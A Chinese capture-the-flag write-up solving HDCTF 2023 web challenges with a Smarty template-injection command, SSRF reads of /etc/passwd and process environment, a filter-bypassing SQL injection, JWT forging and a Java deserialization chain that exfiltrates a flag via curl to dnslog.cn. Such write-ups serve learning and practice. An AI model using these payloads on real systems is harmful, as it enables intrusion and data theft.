Welcome To HDCTF 2023
看源码找到game.js
找到这一串
放到控制台运行即可
SearchMaster
题目让post提交一个data
随便传一个在页面执行了
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-08UzuIeS-1682231444902)(../../../AppData/Roaming/Typora/typora-user-images/image-20230422194238228.png)]](https://img-blog.csdnimg.cn/05c85b01ca9e4c6082c489ea7e575e6a.png)
当传入{时他会报错,看报错信息发现
Smarty,猜测Smarty的ssti,数据发送到前端
用{if}标签即可
{if phpinfo()}{/if}
可以执行phpinfo()
直接命令执行即可
data={if system('cat /f*')}{/if}
YamiYami
三个链接,点read somethings之后看url
应该是ssrf尝试一下文件读取
?url=file:///etc/passwd
可以读,但不能读flag,尝试读环境变量
?url=file:///proc/1/environ
可以看到flag在环境变量中
LoginMaster
用dirsearch扫目录扫出
/robots.txt
function checkSql($s)
{if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){alertMes('hacker', 'index.php');}
}
if ($row['password'] === $password) {die($FLAG);} else {alertMes("wrong password",'index.php');
可以参考这个
1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#
JavaMonster
jwt
将admin改成Boogipop解出jwt传入cookie:a=1;b=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2ODIxNzcxMTgsImlhdCI6MTY4MjE2OTkxOCwidXNlcm5hbWUiOiJCb29naXBvcCJ9.1dfoUuPRgwflPRL8beAumUMOCVFIRCV4yAjXd18Syko
public static void main(String[] args) throws UnsupportedEncodingException {com.ctf.easyjava.utils.JwtUtil jwtUtil = new com.ctf.easyjava.utils.JwtUtil();User user = new User("Boogipop", "123");String token = jwtUtil.JwtCreate(user);System.out.println(token);System.out.println(jwtUtil.Jwttoken(token));
}
hashcode
USy to solve EasyJava的hash等于Try to solve EasyJava
rome二次反序列化
将结果带入dnslog
package com.ctf.easyjava;import com.ctf.easyjava.hdctf.HDCTF;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;import javax.xml.transform.Templates;
import java.util.HashMap;
import static com.ctf.easyjava.Tool.*;public class R_SignedObject {public static void main(String[] args) throws Exception{ClassPool pool = ClassPool.getDefault();CtClass ctClass = pool.makeClass("i");CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");ctClass.setSuperclass(superClass);CtConstructor constructor = ctClass.makeClassInitializer();constructor.setBody("Runtime.getRuntime().exec(new String[]{\"/bin/sh\", \"-c\", \"cat /flag_is_is_here | while read line; do echo $line.4m7ytd.dnslog.cn | xargs curl; done\"});");byte[] bytes = ctClass.toBytecode();TemplatesImpl obj = new TemplatesImpl();setFieldValue(obj, "_bytecodes", new byte[][]{bytes});setFieldValue(obj, "_name", "Poria");setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());HashMap table1 = getPayload(Templates.class, obj);HDCTF hdctf = new HDCTF(table1);HashMap table2 = getPayload(HDCTF.class, hdctf);
//run(table2, "debug", "object");}public static HashMap getPayload (Class clazz, Object payloadObj) throws Exception{EqualsBean bean = new EqualsBean(String.class, "r");HashMap map1 = new HashMap();HashMap map2 = new HashMap();map1.put("yy", bean);map1.put("zZ", payloadObj);map2.put("zZ", bean);map2.put("yy", payloadObj);HashMap table = new HashMap();table.put(map1, "1");table.put(map2, "2");setFieldValue(bean, "_beanClass", clazz);setFieldValue(bean, "_obj", payloadObj);return table;}
}
